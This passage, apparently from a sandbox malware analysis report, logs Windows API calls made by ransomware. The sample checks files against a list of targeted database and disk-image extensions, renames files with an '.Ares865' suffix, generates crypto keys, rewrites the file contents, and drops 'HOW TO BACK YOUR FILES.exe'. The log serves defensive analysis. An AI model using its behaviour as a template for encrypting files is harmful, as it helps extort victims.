(lpString="vdi") returned 3 [0060.519] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0060.519] lstrlenW (lpString="vhd") returned 3 [0060.519] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0060.519] lstrlenW (lpString="vhdx") returned 4 [0060.519] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0060.519] lstrlenW (lpString="avhd") returned 4 [0060.519] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0060.519] lstrlenW (lpString="db") returned 2 [0060.519] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0060.519] lstrlenW (lpString="db2") returned 3 [0060.519] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0060.519] lstrlenW (lpString="db3") returned 3 [0060.519] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0060.519] lstrlenW (lpString="dbf") returned 3 [0060.519] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0060.519] lstrlenW (lpString="mdf") returned 3 [0060.519] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0060.519] lstrlenW (lpString="mdb") returned 3 [0060.519] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0060.519] lstrlenW (lpString="sql") returned 3 [0060.519] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0060.519] lstrlenW (lpString="sqlite") returned 6 [0060.519] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0060.519] lstrlenW (lpString="sqlite3") returned 7 [0060.519] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0060.519] lstrlenW (lpString="sqlitedb") returned 8 [0060.519] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0060.519] lstrlenW (lpString="xml") returned 3 [0060.519] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0060.519] lstrlenW (lpString="$er") returned 3 [0060.519] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0060.519] lstrlenW (lpString="4dd") returned 3 [0060.519] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0060.519] lstrlenW (lpString="4dl") returned 3 [0060.519] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0060.519] lstrlenW (lpString="^^^") returned 3 [0060.520] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0060.520] lstrlenW (lpString="abs") returned 3 [0060.520] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0060.520] lstrlenW (lpString="abx") returned 3 [0060.520] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0060.520] lstrlenW (lpString="accdb") returned 5 [0060.520] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0060.520] lstrlenW (lpString="accdc") returned 5 [0060.520] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0060.520] lstrlenW (lpString="accde") returned 5 [0060.520] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0060.520] lstrlenW (lpString="accdr") returned 5 [0060.520] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0060.520] lstrlenW (lpString="accdt") returned 5 [0060.520] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0060.520] lstrlenW (lpString="accdw") returned 5 [0060.520] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0060.520] lstrlenW (lpString="accft") returned 5 [0060.520] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0060.520] lstrlenW (lpString="adb") returned 3 [0060.520] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0060.520] lstrlenW (lpString="adb") returned 3 [0060.520] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0060.520] lstrlenW (lpString="ade") returned 3 [0060.520] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0060.520] lstrlenW (lpString="adf") returned 3 [0060.520] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0060.520] lstrlenW (lpString="adn") returned 3 [0060.520] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0060.520] lstrlenW (lpString="adp") returned 3 [0060.520] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0060.520] lstrlenW (lpString="alf") returned 3 [0060.520] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0060.520] lstrlenW (lpString="ask") returned 3 [0060.520] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0060.520] lstrlenW (lpString="btr") returned 3 [0060.520] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0060.520] lstrlenW (lpString="cat") returned 3 [0060.521] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0060.521] lstrlenW (lpString="cdb") returned 3 [0060.521] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0060.521] lstrlenW (lpString="ckp") returned 3 [0060.521] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0060.521] lstrlenW (lpString="cma") returned 3 [0060.521] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0060.521] lstrlenW (lpString="cpd") returned 3 [0060.521] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0060.521] lstrlenW (lpString="dacpac") returned 6 [0060.521] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0060.521] lstrlenW (lpString="dad") returned 3 [0060.521] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0060.521] lstrlenW (lpString="dadiagrams") returned 10 [0060.521] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0060.521] lstrlenW (lpString="daschema") returned 8 [0060.521] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0060.521] lstrlenW (lpString="db-journal") returned 10 [0060.521] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0060.521] lstrlenW (lpString="db-shm") returned 6 [0060.521] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0060.521] lstrlenW (lpString="db-wal") returned 6 [0060.521] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0060.521] lstrlenW (lpString="dbc") returned 3 [0060.521] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0060.521] lstrlenW (lpString="dbs") returned 3 [0060.521] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0060.521] lstrlenW (lpString="dbt") returned 3 [0060.521] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0060.521] lstrlenW (lpString="dbv") returned 3 [0060.521] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0060.521] lstrlenW (lpString="dbx") returned 3 [0060.521] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0060.521] lstrlenW (lpString="dcb") returned 3 [0060.521] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0060.521] lstrlenW (lpString="dct") returned 3 [0060.521] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0060.521] lstrlenW (lpString="dcx") returned 3 [0060.522] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0060.522] lstrlenW (lpString="ddl") returned 3 [0060.522] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0060.522] lstrlenW (lpString="dlis") returned 4 [0060.522] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0060.522] lstrlenW (lpString="dp1") returned 3 [0060.522] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0060.522] lstrlenW (lpString="dqy") returned 3 [0060.522] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0060.522] lstrlenW (lpString="dsk") returned 3 [0060.522] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0060.522] lstrlenW (lpString="dsn") returned 3 [0060.522] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0060.522] lstrlenW (lpString="dtsx") returned 4 [0060.522] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0060.522] lstrlenW (lpString="dxl") returned 3 [0060.522] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0060.522] lstrlenW (lpString="eco") returned 3 [0060.522] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0060.522] lstrlenW (lpString="ecx") returned 3 [0060.522] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0060.522] lstrlenW (lpString="edb") returned 3 [0060.522] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0060.522] lstrlenW (lpString="epim") returned 4 [0060.522] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0060.522] lstrlenW (lpString="fcd") returned 3 [0060.522] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0060.522] lstrlenW (lpString="fdb") returned 3 [0060.522] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0060.522] lstrlenW (lpString="fic") returned 3 [0060.522] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0060.522] lstrlenW (lpString="flexolibrary") returned 12 [0060.522] lstrlenW (lpString="fm5") returned 3 [0060.522] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0060.522] lstrlenW (lpString="fmp") returned 3 [0060.523] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0060.523] lstrlenW (lpString="fmp12") returned 5 [0060.523] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0060.523] lstrlenW (lpString="fmpsl") returned 5 [0060.523] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0060.523] lstrlenW (lpString="fol") returned 3 [0060.523] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0060.523] lstrlenW (lpString="fp3") returned 3 [0060.523] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0060.523] lstrlenW (lpString="fp4") returned 3 [0060.523] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0060.523] lstrlenW (lpString="fp5") returned 3 [0060.523] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0060.523] lstrlenW (lpString="fp7") returned 3 [0060.523] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0060.523] lstrlenW (lpString="fpt") returned 3 [0060.523] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0060.523] lstrlenW (lpString="frm") returned 3 [0060.523] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0060.523] lstrlenW (lpString="gdb") returned 3 [0060.523] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0060.523] lstrlenW (lpString="gdb") returned 3 [0060.523] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0060.523] lstrlenW (lpString="grdb") returned 4 [0060.523] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0060.523] lstrlenW (lpString="gwi") returned 3 [0060.523] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0060.523] lstrlenW (lpString="hdb") returned 3 [0060.523] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0060.523] lstrlenW (lpString="his") returned 3 [0060.523] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0060.523] lstrlenW (lpString="ib") returned 2 [0060.523] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0060.523] lstrlenW (lpString="idb") returned 3 [0060.523] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0060.523] lstrlenW (lpString="ihx") returned 3 [0060.523] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0060.523] lstrlenW (lpString="itdb") returned 4 [0060.524] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0060.524] lstrlenW (lpString="itw") returned 3 [0060.524] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0060.524] lstrlenW (lpString="jet") returned 3 [0060.524] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0060.524] lstrlenW (lpString="jtx") returned 3 [0060.524] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0060.524] lstrlenW (lpString="kdb") returned 3 [0060.524] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0060.524] lstrlenW (lpString="kexi") returned 4 [0060.524] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0060.524] lstrlenW (lpString="kexic") returned 5 [0060.524] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0060.524] lstrlenW (lpString="kexis") returned 5 [0060.524] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0060.524] lstrlenW (lpString="lgc") returned 3 [0060.524] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0060.524] lstrlenW (lpString="lwx") returned 3 [0060.524] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0060.524] lstrlenW (lpString="maf") returned 3 [0060.524] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0060.524] lstrlenW (lpString="maq") returned 3 [0060.524] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0060.524] lstrlenW (lpString="mar") returned 3 [0060.524] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0060.524] lstrlenW (lpString="marshal") returned 7 [0060.524] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0060.524] lstrlenW (lpString="mas") returned 3 [0060.524] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0060.524] lstrlenW (lpString="mav") returned 3 [0060.524] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0060.524] lstrlenW (lpString="maw") returned 3 [0060.524] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0060.524] lstrlenW (lpString="mdbhtml") returned 7 [0060.524] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0060.524] lstrlenW (lpString="mdn") returned 3 [0060.524] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0060.524] lstrlenW (lpString="mdt") returned 3 [0060.525] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0060.525] lstrlenW (lpString="mfd") returned 3 [0060.525] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0060.525] lstrlenW (lpString="mpd") returned 3 [0060.525] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0060.525] lstrlenW (lpString="mrg") returned 3 [0060.525] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0060.525] lstrlenW (lpString="mud") returned 3 [0060.525] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0060.525] lstrlenW (lpString="mwb") returned 3 [0060.525] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0060.525] lstrlenW (lpString="myd") returned 3 [0060.525] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0060.525] lstrlenW (lpString="ndf") returned 3 [0060.525] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0060.525] lstrlenW (lpString="nnt") returned 3 [0060.525] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0060.525] lstrlenW (lpString="nrmlib") returned 6 [0060.525] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0060.525] lstrlenW (lpString="ns2") returned 3 [0060.525] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0060.525] lstrlenW (lpString="ns3") returned 3 [0060.525] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0060.525] lstrlenW (lpString="ns4") returned 3 [0060.525] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0060.525] lstrlenW (lpString="nsf") returned 3 [0060.525] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0060.525] lstrlenW (lpString="nv") returned 2 [0060.525] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0060.525] lstrlenW (lpString="nv2") returned 3 [0060.525] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0060.525] lstrlenW (lpString="nwdb") returned 4 [0060.525] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0060.525] lstrlenW (lpString="nyf") returned 3 [0060.525] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0060.525] lstrlenW (lpString="odb") returned 3 [0060.525] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0060.525] lstrlenW (lpString="odb") returned 3 [0060.525] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0060.526] lstrlenW (lpString="oqy") returned 3 [0060.526] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0060.526] lstrlenW (lpString="ora") returned 3 [0060.526] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0060.526] lstrlenW (lpString="orx") returned 3 [0060.526] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0060.526] lstrlenW (lpString="owc") returned 3 [0060.526] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0060.526] lstrlenW (lpString="p96") returned 3 [0060.526] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0060.526] lstrlenW (lpString="p97") returned 3 [0060.526] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0060.526] lstrlenW (lpString="pan") returned 3 [0060.526] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0060.526] lstrlenW (lpString="pdb") returned 3 [0060.526] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0060.526] lstrlenW (lpString="pdm") returned 3 [0060.526] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0060.526] lstrlenW (lpString="pnz") returned 3 [0060.526] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0060.526] lstrlenW (lpString="qry") returned 3 [0060.526] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0060.526] lstrlenW (lpString="qvd") returned 3 [0060.526] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0060.526] lstrlenW (lpString="rbf") returned 3 [0060.526] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0060.526] lstrlenW (lpString="rctd") returned 4 [0060.526] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0060.526] lstrlenW (lpString="rod") returned 3 [0060.526] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0060.526] lstrlenW (lpString="rodx") returned 4 [0060.526] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0060.526] lstrlenW (lpString="rpd") returned 3 [0060.526] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0060.526] lstrlenW (lpString="rsd") returned 3 [0060.526] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0060.526] lstrlenW (lpString="sas7bdat") returned 8 [0060.526] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0060.527] lstrlenW (lpString="sbf") returned 3 [0060.527] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0060.527] lstrlenW (lpString="scx") returned 3 [0060.527] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0060.527] lstrlenW (lpString="sdb") returned 3 [0060.527] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0060.527] lstrlenW (lpString="sdc") returned 3 [0060.527] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0060.527] lstrlenW (lpString="sdf") returned 3 [0060.527] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0060.527] lstrlenW (lpString="sis") returned 3 [0060.527] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0060.527] lstrlenW (lpString="spq") returned 3 [0060.527] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0060.527] lstrlenW (lpString="te") returned 2 [0060.527] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0060.527] lstrlenW (lpString="teacher") returned 7 [0060.527] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0060.527] lstrlenW (lpString="tmd") returned 3 [0060.527] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0060.527] lstrlenW (lpString="tps") returned 3 [0060.527] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0060.527] lstrlenW (lpString="trc") returned 3 [0060.527] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0060.527] lstrlenW (lpString="trc") returned 3 [0060.527] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0060.527] lstrlenW (lpString="trm") returned 3 [0060.527] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0060.527] lstrlenW (lpString="udb") returned 3 [0060.527] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0060.527] lstrlenW (lpString="udl") returned 3 [0060.527] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0060.527] lstrlenW (lpString="usr") returned 3 [0060.527] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0060.527] lstrlenW (lpString="v12") returned 3 [0060.527] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0060.527] lstrlenW (lpString="vis") returned 3 [0060.527] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0060.528] lstrlenW (lpString="vpd") returned 3 [0060.528] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0060.528] lstrlenW (lpString="vvv") returned 3 [0060.528] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0060.528] lstrlenW (lpString="wdb") returned 3 [0060.528] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0060.528] lstrlenW (lpString="wmdb") returned 4 [0060.528] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0060.528] lstrlenW (lpString="wrk") returned 3 [0060.528] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0060.528] lstrlenW (lpString="xdb") returned 3 [0060.528] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0060.528] lstrlenW (lpString="xld") returned 3 [0060.528] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0060.528] lstrlenW (lpString="xmlff") returned 5 [0060.528] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0060.528] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\desktop.ini.Ares865") returned 102 [0060.528] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\desktop.ini" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\content.ie5\\mm5o9xqs\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\content.ie5\\mm5o9xqs\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0060.529] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\content.ie5\\mm5o9xqs\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0060.529] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67) returned 1 [0060.529] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0060.529] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0060.529] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0060.529] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0060.530] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0060.530] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.530] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x164 [0060.532] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0060.532] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0060.533] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0060.533] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.533] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0060.533] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0060.533] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0060.533] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0060.533] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0060.533] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0060.533] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0060.534] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0060.534] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0060.534] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0060.534] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0060.534] CloseHandle (hObject=0x164) returned 1 [0060.534] CloseHandle (hObject=0x15c) returned 1 [0060.534] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0060.534] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0060.534] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0060.534] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a613160, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0060.534] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0060.534] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a613160, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0060.534] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0060.534] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b90 [0060.534] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft") returned="C:\\Users\\Default User\\Local Settings\\Microsoft" [0060.534] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2100 | out: hHeap=0x2b0000) returned 1 [0060.534] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0060.534] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft") returned 46 [0060.534] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft") returned="C:\\Users\\Default User\\Local Settings\\Microsoft" [0060.534] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0060.535] CopyFileW 